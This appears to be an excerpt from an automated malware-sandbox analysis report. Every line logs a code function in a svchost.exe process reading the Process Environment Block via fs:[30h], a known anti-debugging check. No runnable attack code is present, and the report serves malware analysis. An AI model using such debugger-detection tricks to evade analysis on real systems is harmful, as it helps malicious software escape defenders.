            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036383C0 mov eax, dword ptr fs:[00000030h]8_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036383C0 mov eax, dword ptr fs:[00000030h]8_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036383C0 mov eax, dword ptr fs:[00000030h]8_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036383C0 mov eax, dword ptr fs:[00000030h]8_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]8_2_036EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036533A5 mov eax, dword ptr fs:[00000030h]8_2_036533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036633A0 mov eax, dword ptr fs:[00000030h]8_2_036633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036633A0 mov eax, dword ptr fs:[00000030h]8_2_036633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362E388 mov eax, dword ptr fs:[00000030h]8_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362E388 mov eax, dword ptr fs:[00000030h]8_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362E388 mov eax, dword ptr fs:[00000030h]8_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365438F mov eax, dword ptr fs:[00000030h]8_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365438F mov eax, dword ptr fs:[00000030h]8_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370539D mov eax, dword ptr fs:[00000030h]8_2_0370539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0368739A mov eax, dword ptr fs:[00000030h]8_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0368739A mov eax, dword ptr fs:[00000030h]8_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03628397 mov eax, dword ptr fs:[00000030h]8_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03628397 mov eax, dword ptr fs:[00000030h]8_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03628397 mov eax, dword ptr fs:[00000030h]8_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03634260 mov eax, dword ptr fs:[00000030h]8_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03634260 mov eax, dword ptr fs:[00000030h]8_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03634260 mov eax, dword ptr fs:[00000030h]8_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FD26B mov eax, dword ptr fs:[00000030h]8_2_036FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FD26B mov eax, dword ptr fs:[00000030h]8_2_036FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362826B mov eax, dword ptr fs:[00000030h]8_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03659274 mov eax, dword ptr fs:[00000030h]8_2_03659274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03671270 mov eax, dword ptr fs:[00000030h]8_2_03671270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03671270 mov eax, dword ptr fs:[00000030h]8_2_03671270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h]8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629240 mov eax, dword ptr fs:[00000030h]8_2_03629240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629240 mov eax, dword ptr fs:[00000030h]8_2_03629240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366724D mov eax, dword ptr fs:[00000030h]8_2_0366724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A250 mov eax, dword ptr fs:[00000030h]8_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EB256 mov eax, dword ptr fs:[00000030h]8_2_036EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EB256 mov eax, dword ptr fs:[00000030h]8_2_036EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03636259 mov eax, dword ptr fs:[00000030h]8_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705227 mov eax, dword ptr fs:[00000030h]8_2_03705227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362823B mov eax, dword ptr fs:[00000030h]8_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03667208 mov eax, dword ptr fs:[00000030h]8_2_03667208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03667208 mov eax, dword ptr fs:[00000030h]8_2_03667208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h]8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036402E1 mov eax, dword ptr fs:[00000030h]8_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036402E1 mov eax, dword ptr fs:[00000030h]8_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036402E1 mov eax, dword ptr fs:[00000030h]8_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037052E2 mov eax, dword ptr fs:[00000030h]8_2_037052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF2F8 mov eax, dword ptr fs:[00000030h]8_2_036EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036292FF mov eax, dword ptr fs:[00000030h]8_2_036292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A2C3 mov eax, dword ptr fs:[00000030h]8_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A2C3 mov eax, dword ptr fs:[00000030h]8_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A2C3 mov eax, dword ptr fs:[00000030h]8_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A2C3 mov eax, dword ptr fs:[00000030h]8_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A2C3 mov eax, dword ptr fs:[00000030h]8_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h]8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036392C5 mov eax, dword ptr fs:[00000030h]8_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036392C5 mov eax, dword ptr fs:[00000030h]8_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B2D3 mov eax, dword ptr fs:[00000030h]8_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B2D3 mov eax, dword ptr fs:[00000030h]8_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B2D3 mov eax, dword ptr fs:[00000030h]8_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365F2D0 mov eax, dword ptr fs:[00000030h]8_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365F2D0 mov eax, dword ptr fs:[00000030h]8_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036402A0 mov eax, dword ptr fs:[00000030h]8_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036402A0 mov eax, dword ptr fs:[00000030h]8_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036452A0 mov eax, dword ptr fs:[00000030h]8_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036452A0 mov eax, dword ptr fs:[00000030h]8_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036452A0 mov eax, dword ptr fs:[00000030h]8_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036452A0 mov eax, dword ptr fs:[00000030h]8_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F92A6 mov eax, dword ptr fs:[00000030h]8_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F92A6 mov eax, dword ptr fs:[00000030h]8_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F92A6 mov eax, dword ptr fs:[00000030h]8_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F92A6 mov eax, dword ptr fs:[00000030h]8_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C62A0 mov eax, dword ptr fs:[00000030h]8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C62A0 mov ecx, dword ptr fs:[00000030h]8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C62A0 mov eax, dword ptr fs:[00000030h]8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C62A0 mov eax, dword ptr fs:[00000030h]8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C62A0 mov eax, dword ptr fs:[00000030h]8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C62A0 mov eax, dword ptr fs:[00000030h]8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C72A0 mov eax, dword ptr fs:[00000030h]8_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C72A0 mov eax, dword ptr fs:[00000030h]8_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B92BC mov eax, dword ptr fs:[00000030h]8_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B92BC mov eax, dword ptr fs:[00000030h]8_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B92BC mov ecx, dword ptr fs:[00000030h]8_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B92BC mov ecx, dword ptr fs:[00000030h]8_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366E284 mov eax, dword ptr fs:[00000030h]8_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366E284 mov eax, dword ptr fs:[00000030h]8_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B0283 mov eax, dword ptr fs:[00000030h]8_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B0283 mov eax, dword ptr fs:[00000030h]8_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B0283 mov eax, dword ptr fs:[00000030h]8_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705283 mov eax, dword ptr fs:[00000030h]8_2_03705283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366329E mov eax, dword ptr fs:[00000030h]8_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366329E mov eax, dword ptr fs:[00000030h]8_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h]8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C9179 mov eax, dword ptr fs:[00000030h]8_2_036C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705152 mov eax, dword ptr fs:[00000030h]8_2_03705152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C4144 mov eax, dword ptr fs:[00000030h]8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C4144 mov eax, dword ptr fs:[00000030h]8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C4144 mov ecx, dword ptr fs:[00000030h]8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C4144 mov eax, dword ptr fs:[00000030h]8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C4144 mov eax, dword ptr fs:[00000030h]8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629148 mov eax, dword ptr fs:[00000030h]8_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629148 mov eax, dword ptr fs:[00000030h]8_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629148 mov eax, dword ptr fs:[00000030h]8_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629148 mov eax, dword ptr fs:[00000030h]8_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03637152 mov eax, dword ptr fs:[00000030h]8_2_03637152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362C156 mov eax, dword ptr fs:[00000030h]8_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03636154 mov eax, dword ptr fs:[00000030h]8_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03636154 mov eax, dword ptr fs:[00000030h]8_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03660124 mov eax, dword ptr fs:[00000030h]8_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03631131 mov eax, dword ptr fs:[00000030h]8_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03631131 mov eax, dword ptr fs:[00000030h]8_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov ecx, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov eax, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov eax, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov eax, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F0115 mov eax, dword ptr fs:[00000030h]8_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036351ED mov eax, dword ptr fs:[00000030h]8_2_036351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037061E5 mov eax, dword ptr fs:[00000030h]8_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036601F8 mov eax, dword ptr fs:[00000030h]8_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F61C3 mov eax, dword ptr fs:[00000030h]8_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F61C3 mov eax, dword ptr fs:[00000030h]8_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366D1D0 mov eax, dword ptr fs:[00000030h]8_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]8_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037051CB mov eax, dword ptr fs:[00000030h]8_2_037051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364B1B0 mov eax, dword ptr fs:[00000030h]8_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03670185 mov eax, dword ptr fs:[00000030h]8_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EC188 mov eax, dword ptr fs:[00000030h]8_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EC188 mov eax, dword ptr fs:[00000030h]8_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A197 mov eax, dword ptr fs:[00000030h]8_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A197 mov eax, dword ptr fs:[00000030h]8_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A197 mov eax, dword ptr fs:[00000030h]8_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03687190 mov eax, dword ptr fs:[00000030h]8_2_03687190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B106E mov eax, dword ptr fs:[00000030h]8_2_036B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705060 mov eax, dword ptr fs:[00000030h]8_2_03705060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov ecx, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365C073 mov eax, dword ptr fs:[00000030h]8_2_0365C073
